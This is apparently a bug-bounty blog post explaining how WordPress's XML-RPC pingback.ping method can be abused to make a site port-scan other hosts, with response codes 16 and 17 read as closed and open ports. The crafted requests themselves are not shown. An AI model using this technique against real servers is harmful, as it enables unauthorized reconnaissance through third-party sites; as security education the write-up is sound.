WordPress XML-RPC Pingback Vulnerability
Hi all, Today, I going to Talk About Word Press XMS-RPC Pingback Vulnerability.
Using this vulnerability we can perform a Port Scan on Intranet & Internet. Before that lets start with quick description:
What is a Pingback?
A pingback is one of three types of linkbacks, methods for Web authors to request notification when somebody links to one of their documents. This enables authors to keep track of who is linking to, or referring to their articles. Some weblog software, such as Movable Type, Serendipity, WordPress, and Telligent Community, support automatic pingbacks where all the links in a published article can be pinged when the article is published.
What is XML-RPC?
XML-RPC is a remote procedure call (RPC) protocol which uses XML to encode its calls and HTTP as a transport mechanism. ”XML-RPC” also refers generically to the use of XML for remote procedure call, independently of the specific protocol. This article is about the protocol named “XML-RPC”.
WordPress has an XMLRPC API that can be accessed through the “xmlrpc.php” file. One of the methods exposed through this API is the “pingback.ping” method. With this method, other blogs can announce pingbacks.
(Note: The latest version of WordPress, version 3.5 was recently released on December 11, 2012. This latest version of WordPress comes pre-packaged with the XML-RPC interface enabled by default.)
We can easily determine XML-RPC API service is running on WordPress by accessing default location “xmlrcp.php” by visiting below location:
Let’s go further and check if the XML-RPC Service is enable or not by simply sending XML Request given below:
(Note: WordPress comes with a couple test plugins that we can simply use to test out the functionality. We are going to demonstrate a simple ‘demo.sayHello‘XML-RPC request.)
Now that we know the XML-RPC interface is available and functioning properly, we can try to take advantage of the Pingback API. We will send a crafted request for performing port scan by using WordPress XML-RPC Service. The Crafted request for Port Scan given below.
In above image,
Target must be the URL for which attacker want to run a PORT scan.
ValidPostlink must be the Post published on the vulnerable XML-RPC Service.
So let’s send this request to Vulnerable XML-RPC service,
In above case the XML Response with int value as 16 which means the on target server port 22 is closed.
In above case the XML Response with int value as 17 which means the on target server port 80 is open.
By interfacing with the API an attacker can cause the WordPress site to port scan an external target and return results. Using a small ruby script we were able to run a port scan on external target from the affected WordPress server (Metaspoit has module for that Name “WordPress Pingback PortScanner”.)
Using XML-RPC feature, an attacker can scan other hosts on the intranet or internet via the affected server.
Thanks!! Please comment below, always welcome for feedbacks.
Happy Bounty Hunting !!